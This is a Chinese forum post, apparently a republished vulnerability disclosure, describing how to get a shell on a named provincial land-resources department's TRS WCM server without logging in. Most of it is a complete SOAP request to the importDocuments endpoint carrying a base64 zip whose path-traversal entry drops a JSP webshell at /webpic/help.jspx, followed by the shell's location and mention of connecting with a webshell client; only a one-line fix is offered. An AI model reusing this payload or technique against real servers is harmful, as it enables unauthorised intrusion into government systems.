HanDs
管理员

[7月漏洞公开] 内蒙古国土资源厅getshell 



之前看了applychen大神的漏洞分析...

然后,就再网上试了下...

然后,就发现内蒙古国土资源厅存在这个漏洞...

详细说明:

漏洞位置在:http://*.*.*.*/wcm/services/trswcm:SOAPService

问题发生在SOAPServiceImpl.java中的public String importDocuments(byte _pImportFileContent[], String _sFileExt)方法,当_sFileExt为zip时调用importFromZip():

详见applychen的分析 http://**.**.**.**/bugs/wooyun-2010-0162315

可以无需登录直接GETSHELL...

构造WebShell可以按照applychen说的,一步一步来,[email protected]

具体构造代码如下:

code 区域
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:soap="http://**.**.**.**/wsdl/soap/"  xmlns:xsd="http://**.**.**.**/1999/XMLSchema"  xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance"  xmlns:m0="http://**.**.**.**/"  xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="http://**.**.**.**/wcm/services/trswcm:SOAPService">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<importDocuments> <in0>UEsDBBQAAAAIADUhmkeOyaBJaQkAAKcdAAAcAAAALi4vLi4vLi4vLi4vd2VicGljL2hlbHAuanNweLVZe2/bOBL//4D7DiqBO0hrW47d5La1qhRJauedOI9igXWNgyxRsVK9QtK14zTf/WaohyVbSdXtXoAmEjkczfzmzX6453GPRZFQFoEf8h68mmQqRNxrt++tb5bOZ6FuR0H75GbYHlp3lCSEOdF8Ptfnb/WI3bU779+/by+mIvBTop5dzQs+Av+E37YjBgy/Uca9KDRJR++SXSmR4zFqC+8b1WP4pmJHoaChuH2MqUkEXYh28hXc7Id25HjhnUk+3w5a74jSrmThBXHEhEmkIF6k/0Zq0M2E59ejDKmoR8gfanJENQuU1PYtZgkvCndvBAN9leHcMcnCs6LAI0a6ZvMMhmylf6CmT1wTUxbNudJf2DRGTk+MihkLlZDOlYRI5fodFfuPgnKVHN9ctt6923nf6hCtaXPNeD6IwhAFjkLl8DW+yc5orCxMrsNzoGo6j31PqOQL+xISzTjwLc51N2IXVkDVxWhrnNJphufCe2ese6FDF5euSu6did2LmGX7lGhvzFZHywT/xAA7dm6F1h1lKPlKwIRHwrNBeqSxGG2Pm4tRd6zTh5nl8+O7ELzvwOJUJaN2OPP9MdE+EtJDGiB8W4Pw7RhAoT6nTwVkbLOmWP8PaRA83afhnZjubmtPts7h65aw/OhORQRA3hQ723h+/hZ5jrK3l1pyf+a6lCl8smnQgedThY3GJj7ovsfFNeQMrmoGmFD1QqF45pbh/dsXBks/b3iNhvbEJ7oVxzR0VDbyQPEo+RT6w2zCk+etZlfTMmn293O/atYTKxqY6MD4rHKt6YOU0UDKiEsoY8bwtsmvmnxgEmKswvuTJajiCOMGos+n+DaIWGAJxQ0k3/V1lTzCT+v8vOU4ytFRLwh6nJMyEIpEws+QUCQUjpD8yl9WfYQFgkGcR47netTBEOC3phvobvI9R2gGvzIloW2F19QCmo/kGpyawIbSyLf+YJ6guKf8ITfBGeSWxz/JRBOxR1Ur2kTu3lEhgxDCpP1FkAa/bRD8KzcTDXBPbl01iAzfxOn5oGGus6jHAay9koIPNCMxfr+fG/8FY7tFW6OC7rp2kmwBTuCWfCAzz1c0z1cF7aMscgN9RQMBtzeL0dex7lCfIpDaEwgkV0DBoYVaoJ8+uzlFKvdgsHLaIyh4N5R9A4JryuMo5BA5m9qgLKExgUwLaXIitZIvO53uGGKIUQhcdN2E0+VMxDMB36BWoETclFmluAikSZxQ5zhckXpccq7YUjMci2sc9Iu4Ppd+pJLWLmmQ70Rb1QStudV8qxnzKRpADU2P6wz9cQLrILmWpuecB66HgFKB6Xfgiei3KvhGXLf9iCOw3uoxwfjwcD0xKM5LlUeZmmSr0327vfOf39+939s/+NQfEKPCgVzdBvkFvaBzuaRJonW0sxMlwN2qkHdydze8htktIKFO84Lm6PbUYntC9TRNOqJ0xm3lu1JF0+hompZAWAbk6KgOIFJpXtK66RReHRlFfCOMMBgcV6cLiCGOC/ASfIWGBb8vmS4hxnh1kN0jIPeo1jIPsXsMMZCZQ5ohjeXovpA2mk7FIoaaTDPIvcKpN5zX/QnrOUD8agj+tIsXHLZoqsRWx8d/k60AcEZDwOc2kjok7E9Ofi5vFkwpz5+ebognajH61aK5UYax7sUWA+wEismpOCvWRkegf9x6qX9I4c/O6mD7+fpMmUnZ4EnlqfXNrZ9wGc3A3A7HC83e1FQ3FjVlpkdQ2Qpdn2asOfAU9Sh6r1bfEV90wer0OdUdj9uJLLnFz8/VskQ/brZSbP280GAnArQTJiUur8ryUvhCuuphhUk18s0JkxqdeSGa842J3WypPWlk40IaRhcXNZrDTN5SS354gDa/pnzmixsqFGbyVwaMjzaa55wKC9zSUmWhurGnNLAgy/UqNtMWm6uZdkwPYX4rd1uyaKf9byfph7Adzw1lryX4y8tf0/bHU1gRjwqtbq0J5nU0S/NVuPKRY+fjYrQz7uGk0ZPHyL9IczVejsZP5HZv/6xPnusCldD/92LvvE9qYDYc/gRmPwaoElXIVAGF7BGYdto+5GtqZ2trpwm/fi+DG+h0Qe2ZoFczCvWVcOgfbaH8prgsChQcTjMIW51x4WhmD8UxWdk+heajkwxeppOMmv4sgNQzC4Wqrc9gBQpZYz1AVFFJo7COdyz5nrYOd/Ai8FdXGfB2nobzh4d1W2Qb8aZR/jLk71YtsByEIDPNZUoxBHt8esUaDyvXbrXcXurTD6UJdYNG6z3Us1NSZypsUzSg4slG0AwNpYbJvojviWFWZJnDem61Oulc5MKvVQGPN+hFBPSmpEfSVZswmZeSfAKwTPLFGllY3iif2eLm9yTccRqAvbhRRH5DmcZ28yFvsrXs0qgp2IzKSyqQdT2xlIFOcfYQ5pfRmszT2ppMWpN7LJ6IPUlzEBC4/oxP1XwYzm1ReSS12DN8cjLPSh0wAViS+ldlzULkrZ9bNZi2JeypmgeQQovuQxIXld9PmWI05BHwOXbwFgJ8uXCmn+wpNzPbppy78M3HN0UWm98sfZTSwkVPqnxeyCtTyIf2+iWnvPXkNvNiAfPvrg0zL32YUS4bwCFQBRRdjSy3SNo5fHyZAGzQs7nB0nlcXoqtrpTVwpWyViaCGcyygU12yazaMh2VcpmJnl1cU0mKcprk/jT7B2qlcMO5g7LlN1TLzoukZNkhZdruK7TdlHZlk3yYz86XAL0BM8s+NXmRdw4SoYVI1qB/8+UNCMxp0hn/TO8jVbJHSsWbpwGCAyQv5dCOlp9p45m9PZVPsilPKfHcx/39fXXZaUqSTYoDpMhaUrzR+4WutGqazNPVMpm//0rTOlmFb4UGn1CDior1N6XZVO48kS278iUTqOAZHVIpX58kF2DLTh3qAVIPBmixLIIq6Q6R7vAQ6ZbdOoyP8MDRUf0Dx3jg+Lj+gRM8cHJSU9FTpD49rc/+DA+cndU/cL5y7dEYmqCnZacQR12tueys3Z4D42djyCLM1kpsXkODASOyjNvkUdVkwldtzYDJL94YPmWUZTt9xiJW2qkQ8gKFvLh4JUIvkeLy8hWKIVIMh69QXCEFtJbQU0r4gA5+VzYQy24BlE0a6BuW3VXj0MNhOvYtm+75PtRb+CFNTEsN4gXWHeVt8uPa2r++vryGrNprt6GHLxa9cjUvXHka0UzoMRAJyH2lAx/a5YqXvON/ze7+8x//A1BLAQIfABQAAAAIADUhmkeOyaBJaQkAAKcdAAAcACQAAAAAAAAAIAAAAAAAAAAuLi8uLi8uLi8uLi93ZWJwaWMvaGVscC5qc3B4CgAgAAAAAAABABgA4x1VMVA/0QEIa6EfUD/RAZRQYkNPP9EBUEsFBgAAAAABAAEAbgAAAKMJAAAAAA==</in0>
<in1>.zip</in1>
</importDocuments>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>



构造完成后记得加个header直接上传。

成功后webshell路径:http://*.*.*.*/webpic/help.jspx

漏洞证明:

1、漏洞发生位置截图:

5.jpg





2、构造截图:

2.jpg





3、上传完成后截图:

3.jpg





4、菜刀连接截图:

6.jpg





修复方案:

验证ZIP内的文件路径合法性


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
内蒙
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复